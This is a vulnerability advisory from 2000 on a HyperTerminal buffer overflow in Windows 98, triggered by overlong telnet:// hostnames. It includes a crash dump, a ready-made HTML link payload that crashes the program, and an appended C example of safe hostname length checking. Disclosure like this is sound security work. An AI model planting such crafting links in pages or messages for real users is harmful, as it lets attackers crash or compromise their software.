adv_telnet1.txt
---------------------------------------------------Meliksah Ozoral
----------------------------------------------------[ICQ 10390761]
[telnet:// Buffer Overflow Vulnerability]-------------------------
------------------------------------------------------[05/09/2000]
[www.meliksah.net]------------------------------------------------
Hi,
I don't know if this has been reported before. Windows runs the default telnet program when it gets a link like telnet://somehost in Explorer.
The default telnet program is HyperTerminal under Windows 98 (NOT NT).
Windows called HyperTerminal when I wrote telnet://www.meliksah.net in Internet Explorer. A telnet:// link with a 153-character-long hostname causes a
buffer overflow in HyperTerminal.
HYPERTRM caused an invalid page fault in
module HYPERTRM.DLL at 0177:7d9fdcf4.
Registers:
EAX=00000065 CS=0177 EIP=7d9fdcf4 EFLGS=00010206
EBX=00000000 SS=017f ESP=0063f8e4 EBP=0063f91c
ECX=0063fc1c DS=017f ESI=00000065 FS=5c3f
EDX=00000000 ES=017f EDI=00665d50 GS=7c7f
Bytes at CS:EIP:
8b 7e 08 8d 9f 08 01 00 00 53 ff 15 f8 86 a2 7d
Stack dump:
00665d50 0066593c 00000000 7da1b94b 00000065 000006f8 0066593c 274d0010
7d9f4222 00663900 00000002 0063f9b0 00000050 7da1ad25 0063fa00 7da1ad5e
I didn't try to run code by using this bug, but we can use this bug on remote computers.
<p><a href="telnet://meliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahnetmeliksahne">Click Here</a></p>
This URL causes HyperTerminal to crash.
This bug was tested on:
Windows 98 [Version 4.10.1998]
Windows 98 [Version 4.10.2222]
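The crash above comes from a telnet:// hostname longer than the handler expects. As an added example (not code from this advisory or from HyperTerminal), the C routine below shows the length check a URL handler needs before copying the host; the name parse_telnet_host and the 64-byte buffer are assumptions, since the advisory does not state HyperTerminal's real buffer size.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: copy the host part of a telnet:// URL into host[].
 * Returns 0 on success, -1 if the URL is not telnet://, -2 if the host is
 * empty or does not fit in host_sz bytes including the terminating NUL.
 * Bracketed IPv6 literals are not handled in this example. */
int parse_telnet_host(const char *url, char *host, size_t host_sz)
{
    static const char scheme[] = "telnet://";
    size_t slen = sizeof scheme - 1;

    if (url == NULL || host == NULL || host_sz == 0)
        return -1;
    for (size_t i = 0; i < slen; i++)          /* case-insensitive scheme match */
        if (tolower((unsigned char)url[i]) != scheme[i])
            return -1;

    const char *p = url + slen;
    size_t auth_len = strcspn(p, "/?#");       /* authority ends at path/query */

    const char *at = memchr(p, '@', auth_len); /* skip optional user[:pass]@ */
    if (at) { auth_len -= (size_t)(at + 1 - p); p = at + 1; }

    const char *colon = memchr(p, ':', auth_len); /* host ends at :port */
    size_t n = colon ? (size_t)(colon - p) : auth_len;

    if (n == 0 || n >= host_sz)
        return -2;               /* reject: never truncate, never overflow */
    memcpy(host, p, n);
    host[n] = '\0';
    return 0;
}

int main(void)
{
    char host[64];                         /* buffer size is an assumption */
    char url[512] = "telnet://";
    memset(url + 9, 'A', 153);             /* constructed 153-character host */

    printf("153-char host: %d\n", parse_telnet_host(url, host, sizeof host));
    printf("normal host:   %d\n",
           parse_telnet_host("telnet://www.meliksah.net", host, sizeof host));
    return 0;
}
```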